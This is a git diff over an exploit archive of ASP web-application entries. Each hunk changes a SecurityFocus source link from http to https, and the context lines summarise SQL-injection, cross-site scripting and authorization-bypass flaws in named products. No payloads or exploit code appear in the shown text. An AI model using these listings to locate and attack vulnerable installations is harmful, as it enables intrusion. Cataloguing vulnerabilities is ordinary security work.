a/exploits/asp/webapps/27169.txt +++ b/exploits/asp/webapps/27169.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16544/info +source: https://www.securityfocus.com/bid/16544/info Whomp! Real Estate Manager is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27174.txt b/exploits/asp/webapps/27174.txt index e49ba42f5..eb4f24460 100644 --- a/exploits/asp/webapps/27174.txt +++ b/exploits/asp/webapps/27174.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16563/info +source: https://www.securityfocus.com/bid/16563/info GA's Forum Light is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27310.txt b/exploits/asp/webapps/27310.txt index f03eee527..311adeec8 100644 --- a/exploits/asp/webapps/27310.txt +++ b/exploits/asp/webapps/27310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16821/info +source: https://www.securityfocus.com/bid/16821/info Battleaxe Software's bttlxeForum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27469.txt b/exploits/asp/webapps/27469.txt index 8c3350250..b3fea78ad 100644 --- a/exploits/asp/webapps/27469.txt +++ b/exploits/asp/webapps/27469.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17236/info +source: https://www.securityfocus.com/bid/17236/info EZHomePagePro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27470.txt b/exploits/asp/webapps/27470.txt index 21f2a63c3..8a0b3694d 100644 --- a/exploits/asp/webapps/27470.txt +++ b/exploits/asp/webapps/27470.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17236/info +source: https://www.securityfocus.com/bid/17236/info EZHomePagePro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27471.txt b/exploits/asp/webapps/27471.txt index 2f2398c5a..92b199d8a 100644 --- a/exploits/asp/webapps/27471.txt +++ b/exploits/asp/webapps/27471.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17236/info +source: https://www.securityfocus.com/bid/17236/info EZHomePagePro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27472.txt b/exploits/asp/webapps/27472.txt index 33884601a..34bbdbe2b 100644 --- a/exploits/asp/webapps/27472.txt +++ b/exploits/asp/webapps/27472.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17236/info +source: https://www.securityfocus.com/bid/17236/info EZHomePagePro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27473.txt b/exploits/asp/webapps/27473.txt index 45a0d8f5e..0325530b8 100644 --- a/exploits/asp/webapps/27473.txt +++ b/exploits/asp/webapps/27473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17236/info +source: https://www.securityfocus.com/bid/17236/info EZHomePagePro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27479.txt b/exploits/asp/webapps/27479.txt index 10251a1e9..9ae8626b6 100644 --- a/exploits/asp/webapps/27479.txt +++ b/exploits/asp/webapps/27479.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17249/info +source: https://www.securityfocus.com/bid/17249/info Toast Forums is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27480.txt b/exploits/asp/webapps/27480.txt index 204084686..283c0dae5 100644 --- a/exploits/asp/webapps/27480.txt +++ b/exploits/asp/webapps/27480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17255/info +source: https://www.securityfocus.com/bid/17255/info Online Quiz System is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27481.txt b/exploits/asp/webapps/27481.txt index ee5ed450e..0167ec70a 100644 --- a/exploits/asp/webapps/27481.txt +++ b/exploits/asp/webapps/27481.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17255/info +source: https://www.securityfocus.com/bid/17255/info Online Quiz System is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27482.txt b/exploits/asp/webapps/27482.txt index e9d5052bd..a94055425 100644 --- a/exploits/asp/webapps/27482.txt +++ b/exploits/asp/webapps/27482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17257/info +source: https://www.securityfocus.com/bid/17257/info Caloris Planitia Technologies School Management System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27486.txt b/exploits/asp/webapps/27486.txt index 9c2e5a63a..aa1ba185c 100644 --- a/exploits/asp/webapps/27486.txt +++ b/exploits/asp/webapps/27486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17263/info +source: https://www.securityfocus.com/bid/17263/info Helm is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27487.txt b/exploits/asp/webapps/27487.txt index 92c09c02d..ac0c02227 100644 --- a/exploits/asp/webapps/27487.txt +++ b/exploits/asp/webapps/27487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17263/info +source: https://www.securityfocus.com/bid/17263/info Helm is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27536.txt b/exploits/asp/webapps/27536.txt index 283d29649..bcda9f118 100644 --- a/exploits/asp/webapps/27536.txt +++ b/exploits/asp/webapps/27536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17332/info +source: https://www.securityfocus.com/bid/17332/info SiteSearch Indexer is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27552.txt b/exploits/asp/webapps/27552.txt index 8a4e76d57..e240f2f6b 100644 --- a/exploits/asp/webapps/27552.txt +++ b/exploits/asp/webapps/27552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17347/info +source: https://www.securityfocus.com/bid/17347/info Site Man is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27757.txt b/exploits/asp/webapps/27757.txt index b2037bb5f..04eee7886 100644 --- a/exploits/asp/webapps/27757.txt +++ b/exploits/asp/webapps/27757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17722/info +source: https://www.securityfocus.com/bid/17722/info DUclassified is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27813.txt b/exploits/asp/webapps/27813.txt index 22e7b64f5..4a5373186 100644 --- a/exploits/asp/webapps/27813.txt +++ b/exploits/asp/webapps/27813.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17829/info +source: https://www.securityfocus.com/bid/17829/info CyberBuild is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27814.txt b/exploits/asp/webapps/27814.txt index d32a271d0..9019c7409 100644 --- a/exploits/asp/webapps/27814.txt +++ b/exploits/asp/webapps/27814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17829/info +source: https://www.securityfocus.com/bid/17829/info CyberBuild is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27815.txt b/exploits/asp/webapps/27815.txt index 38cd827cd..1fe00a08c 100644 --- a/exploits/asp/webapps/27815.txt +++ b/exploits/asp/webapps/27815.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17829/info +source: https://www.securityfocus.com/bid/17829/info CyberBuild is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27816.txt b/exploits/asp/webapps/27816.txt index e80a405d5..3de36b7ed 100644 --- a/exploits/asp/webapps/27816.txt +++ b/exploits/asp/webapps/27816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17829/info +source: https://www.securityfocus.com/bid/17829/info CyberBuild is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27817.txt b/exploits/asp/webapps/27817.txt index 8891d42bd..62895b9bb 100644 --- a/exploits/asp/webapps/27817.txt +++ b/exploits/asp/webapps/27817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17829/info +source: https://www.securityfocus.com/bid/17829/info CyberBuild is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27825.txt b/exploits/asp/webapps/27825.txt index 891ea15e5..8850a8f9d 100644 --- a/exploits/asp/webapps/27825.txt +++ b/exploits/asp/webapps/27825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17877/info +source: https://www.securityfocus.com/bid/17877/info Calendar Manager Pro is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27826.txt b/exploits/asp/webapps/27826.txt index ae2f8e313..7f4dc81ef 100644 --- a/exploits/asp/webapps/27826.txt +++ b/exploits/asp/webapps/27826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17877/info +source: https://www.securityfocus.com/bid/17877/info Calendar Manager Pro is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27827.txt b/exploits/asp/webapps/27827.txt index 0a8b139df..69ca08dd3 100644 --- a/exploits/asp/webapps/27827.txt +++ b/exploits/asp/webapps/27827.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17877/info +source: https://www.securityfocus.com/bid/17877/info Calendar Manager Pro is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27828.txt b/exploits/asp/webapps/27828.txt index 198ffc483..e306d0aa4 100644 --- a/exploits/asp/webapps/27828.txt +++ b/exploits/asp/webapps/27828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17877/info +source: https://www.securityfocus.com/bid/17877/info Calendar Manager Pro is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27842.txt b/exploits/asp/webapps/27842.txt index 5748037fc..a657f65bc 100644 --- a/exploits/asp/webapps/27842.txt +++ b/exploits/asp/webapps/27842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17903/info +source: https://www.securityfocus.com/bid/17903/info MultiCalendars is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27844.txt b/exploits/asp/webapps/27844.txt index aeb1a2131..6282d82c0 100644 --- a/exploits/asp/webapps/27844.txt +++ b/exploits/asp/webapps/27844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17907/info +source: https://www.securityfocus.com/bid/17907/info EPublisherPro is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27846.txt b/exploits/asp/webapps/27846.txt index 1190e340b..a38ea3b98 100644 --- a/exploits/asp/webapps/27846.txt +++ b/exploits/asp/webapps/27846.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17911/info +source: https://www.securityfocus.com/bid/17911/info EImagePro is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/27849.txt b/exploits/asp/webapps/27849.txt index c9c2b03a2..783fa3a1a 100644 --- a/exploits/asp/webapps/27849.txt +++ b/exploits/asp/webapps/27849.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17912/info +source: https://www.securityfocus.com/bid/17912/info EDirectoryPro is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27890.txt b/exploits/asp/webapps/27890.txt index 5db515e08..662e4f680 100644 --- a/exploits/asp/webapps/27890.txt +++ b/exploits/asp/webapps/27890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18013/info +source: https://www.securityfocus.com/bid/18013/info Open Wiki is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27896.txt b/exploits/asp/webapps/27896.txt index 14b62c840..83b6020a0 100644 --- a/exploits/asp/webapps/27896.txt +++ b/exploits/asp/webapps/27896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18025/info +source: https://www.securityfocus.com/bid/18025/info ASPBB is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27897.txt b/exploits/asp/webapps/27897.txt index ca8bf0a73..f3dd83a03 100644 --- a/exploits/asp/webapps/27897.txt +++ b/exploits/asp/webapps/27897.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18025/info +source: https://www.securityfocus.com/bid/18025/info ASPBB is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27898.txt b/exploits/asp/webapps/27898.txt index ed045e650..5cad742d6 100644 --- a/exploits/asp/webapps/27898.txt +++ b/exploits/asp/webapps/27898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18031/info +source: https://www.securityfocus.com/bid/18031/info CodeAvalanche News is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27913.txt b/exploits/asp/webapps/27913.txt index 669d8bc79..e032db806 100644 --- a/exploits/asp/webapps/27913.txt +++ b/exploits/asp/webapps/27913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18126/info +source: https://www.securityfocus.com/bid/18126/info Mini-NUKE is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/27918.txt b/exploits/asp/webapps/27918.txt index 5aea59935..b14c2f435 100644 --- a/exploits/asp/webapps/27918.txt +++ b/exploits/asp/webapps/27918.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18146/info +source: https://www.securityfocus.com/bid/18146/info ASPBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27932.txt b/exploits/asp/webapps/27932.txt index cdf6aef95..45a5740f0 100644 --- a/exploits/asp/webapps/27932.txt +++ b/exploits/asp/webapps/27932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18205/info +source: https://www.securityfocus.com/bid/18205/info Hogstorps guestbook is prone to an access-authorization vulnerability. The issue occurs because the affected script fails to prompt for authentication credentials. diff --git a/exploits/asp/webapps/27945.txt b/exploits/asp/webapps/27945.txt index 66b1c22c1..5233c26bc 100644 --- a/exploits/asp/webapps/27945.txt +++ b/exploits/asp/webapps/27945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18226/info +source: https://www.securityfocus.com/bid/18226/info Enigma Haber is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27960.txt b/exploits/asp/webapps/27960.txt index ee3204eaf..c5db69e56 100644 --- a/exploits/asp/webapps/27960.txt +++ b/exploits/asp/webapps/27960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18254/info +source: https://www.securityfocus.com/bid/18254/info LocazoList Classifieds is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28002.txt b/exploits/asp/webapps/28002.txt index 69f55d649..708729984 100644 --- a/exploits/asp/webapps/28002.txt +++ b/exploits/asp/webapps/28002.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18379/info +source: https://www.securityfocus.com/bid/18379/info KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28003.txt b/exploits/asp/webapps/28003.txt index b129c1f11..d77aecffa 100644 --- a/exploits/asp/webapps/28003.txt +++ b/exploits/asp/webapps/28003.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18379/info +source: https://www.securityfocus.com/bid/18379/info KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28004.txt b/exploits/asp/webapps/28004.txt index 7d8b073b2..a41b50698 100644 --- a/exploits/asp/webapps/28004.txt +++ b/exploits/asp/webapps/28004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18379/info +source: https://www.securityfocus.com/bid/18379/info KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28061.txt b/exploits/asp/webapps/28061.txt index 9bd435935..704ebf765 100644 --- a/exploits/asp/webapps/28061.txt +++ b/exploits/asp/webapps/28061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18504/info +source: https://www.securityfocus.com/bid/18504/info Cisco CallManager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the web-interface to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28062.txt b/exploits/asp/webapps/28062.txt index 62e352718..a7b2a3961 100644 --- a/exploits/asp/webapps/28062.txt +++ b/exploits/asp/webapps/28062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18504/info +source: https://www.securityfocus.com/bid/18504/info Cisco CallManager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the web-interface to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28086.txt b/exploits/asp/webapps/28086.txt index bceba7311..6a7932b6e 100644 --- a/exploits/asp/webapps/28086.txt +++ b/exploits/asp/webapps/28086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18563/info +source: https://www.securityfocus.com/bid/18563/info Maximus SchoolMAX is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/asp/webapps/28193.txt b/exploits/asp/webapps/28193.txt index 4da5a6583..feea97c29 100644 --- a/exploits/asp/webapps/28193.txt +++ b/exploits/asp/webapps/28193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18899/info +source: https://www.securityfocus.com/bid/18899/info Webvizyon is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28203.txt b/exploits/asp/webapps/28203.txt index b68709671..58d355622 100644 --- a/exploits/asp/webapps/28203.txt +++ b/exploits/asp/webapps/28203.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18933/info +source: https://www.securityfocus.com/bid/18933/info Hosting Controller is prone to a cross-site scripting vulnerability because it fails to sanitize input before displaying it to users of the application. diff --git a/exploits/asp/webapps/28208.txt b/exploits/asp/webapps/28208.txt index 7c0100e4d..4fee444a3 100644 --- a/exploits/asp/webapps/28208.txt +++ b/exploits/asp/webapps/28208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18948/info +source: https://www.securityfocus.com/bid/18948/info FlexWatch is prone to an authorization-bypass vulnerability. This issue is due to a failure in the application to properly verify user-supplied input. diff --git a/exploits/asp/webapps/28339.txt b/exploits/asp/webapps/28339.txt index e995cc83d..258a7d336 100644 --- a/exploits/asp/webapps/28339.txt +++ b/exploits/asp/webapps/28339.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19330/info +source: https://www.securityfocus.com/bid/19330/info anychart is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28385.txt b/exploits/asp/webapps/28385.txt index 51314ac5d..d2ead2d9b 100644 --- a/exploits/asp/webapps/28385.txt +++ b/exploits/asp/webapps/28385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19513/info +source: https://www.securityfocus.com/bid/19513/info Multiple cross-site scripting vulnerabilities affect BlaBla 4U because the application fails to properly sanitize user-supplied input before including it in dynamically generated web content. diff --git a/exploits/asp/webapps/28443.html b/exploits/asp/webapps/28443.html index 72918c270..ea7b2ae16 100644 --- a/exploits/asp/webapps/28443.html +++ b/exploits/asp/webapps/28443.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19768/info +source: https://www.securityfocus.com/bid/19768/info Digiappz Freekot is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/28566.txt b/exploits/asp/webapps/28566.txt index bbff5a46e..08dada462 100644 --- a/exploits/asp/webapps/28566.txt +++ b/exploits/asp/webapps/28566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20004/info +source: https://www.securityfocus.com/bid/20004/info Snitz Forums 2000 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/28577.txt b/exploits/asp/webapps/28577.txt index 7c3f20329..415b2428e 100644 --- a/exploits/asp/webapps/28577.txt +++ b/exploits/asp/webapps/28577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20033/info +source: https://www.securityfocus.com/bid/20033/info ClickBlog! is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28587.txt b/exploits/asp/webapps/28587.txt index 8b093e8f2..1e186cf7d 100644 --- a/exploits/asp/webapps/28587.txt +++ b/exploits/asp/webapps/28587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20049/info +source: https://www.securityfocus.com/bid/20049/info EasyPage is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28589.txt b/exploits/asp/webapps/28589.txt index 5dfd49598..7e4b057c0 100644 --- a/exploits/asp/webapps/28589.txt +++ b/exploits/asp/webapps/28589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20054/info +source: https://www.securityfocus.com/bid/20054/info Web Wiz Forums is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/28593.txt b/exploits/asp/webapps/28593.txt index d6d866415..a9fece293 100644 --- a/exploits/asp/webapps/28593.txt +++ b/exploits/asp/webapps/28593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20062/info +source: https://www.securityfocus.com/bid/20062/info ZilekPortal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28597.txt b/exploits/asp/webapps/28597.txt index aa22f6f9b..667d21c21 100644 --- a/exploits/asp/webapps/28597.txt +++ b/exploits/asp/webapps/28597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20080/info +source: https://www.securityfocus.com/bid/20080/info ECardPro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28600.txt b/exploits/asp/webapps/28600.txt index eefacfc22..9cc2676a5 100644 --- a/exploits/asp/webapps/28600.txt +++ b/exploits/asp/webapps/28600.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20089/info +source: https://www.securityfocus.com/bid/20089/info EShoppingPro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28615.txt b/exploits/asp/webapps/28615.txt index 03306c4fb..231c52886 100644 --- a/exploits/asp/webapps/28615.txt +++ b/exploits/asp/webapps/28615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20117/info +source: https://www.securityfocus.com/bid/20117/info DotNetNuke is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/asp/webapps/28742.txt b/exploits/asp/webapps/28742.txt index dd6e82d3d..68e8ac43b 100644 --- a/exploits/asp/webapps/28742.txt +++ b/exploits/asp/webapps/28742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20335/info +source: https://www.securityfocus.com/bid/20335/info ASPPlayground.NET Forum Advanced Edition is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/28762.txt b/exploits/asp/webapps/28762.txt index 0897c04a1..850603f97 100644 --- a/exploits/asp/webapps/28762.txt +++ b/exploits/asp/webapps/28762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20354/info +source: https://www.securityfocus.com/bid/20354/info Civica is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/28768.html b/exploits/asp/webapps/28768.html index 510f41bc1..c3d112eef 100644 --- a/exploits/asp/webapps/28768.html +++ b/exploits/asp/webapps/28768.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20378/info +source: https://www.securityfocus.com/bid/20378/info Emek Portal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28829.txt b/exploits/asp/webapps/28829.txt index 1abd3bdc8..497b6f96c 100644 --- a/exploits/asp/webapps/28829.txt +++ b/exploits/asp/webapps/28829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20607/info +source: https://www.securityfocus.com/bid/20607/info Kinesis Interactive Cinema System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/28857.txt b/exploits/asp/webapps/28857.txt index e8f55492d..1cea3e001 100644 --- a/exploits/asp/webapps/28857.txt +++ b/exploits/asp/webapps/28857.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20712/info +source: https://www.securityfocus.com/bid/20712/info Snitz Forums 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/28869.txt b/exploits/asp/webapps/28869.txt index d63e1945b..99cba7244 100644 --- a/exploits/asp/webapps/28869.txt +++ b/exploits/asp/webapps/28869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20778/info +source: https://www.securityfocus.com/bid/20778/info Web Wiz Forum is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28878.txt b/exploits/asp/webapps/28878.txt index 4bc884869..a48eeacc5 100644 --- a/exploits/asp/webapps/28878.txt +++ b/exploits/asp/webapps/28878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20803/info +source: https://www.securityfocus.com/bid/20803/info Easy notesManager is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/28879.txt b/exploits/asp/webapps/28879.txt index 5f813ae84..dd6277a6d 100644 --- a/exploits/asp/webapps/28879.txt +++ b/exploits/asp/webapps/28879.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20803/info +source: https://www.securityfocus.com/bid/20803/info Easy notesManager is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/28941.txt b/exploits/asp/webapps/28941.txt index c8229b2ba..6aaefe9e5 100644 --- a/exploits/asp/webapps/28941.txt +++ b/exploits/asp/webapps/28941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20965/info +source: https://www.securityfocus.com/bid/20965/info Immediacy CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28985.txt b/exploits/asp/webapps/28985.txt index 69a7a3a56..a316074a3 100644 --- a/exploits/asp/webapps/28985.txt +++ b/exploits/asp/webapps/28985.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21036/info +source: https://www.securityfocus.com/bid/21036/info 20/20 Real Estate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/28986.asp b/exploits/asp/webapps/28986.asp index 7009b52b4..8ae1e96ea 100644 --- a/exploits/asp/webapps/28986.asp +++ b/exploits/asp/webapps/28986.asp @@ -1,4 +1,4 @@ -source: 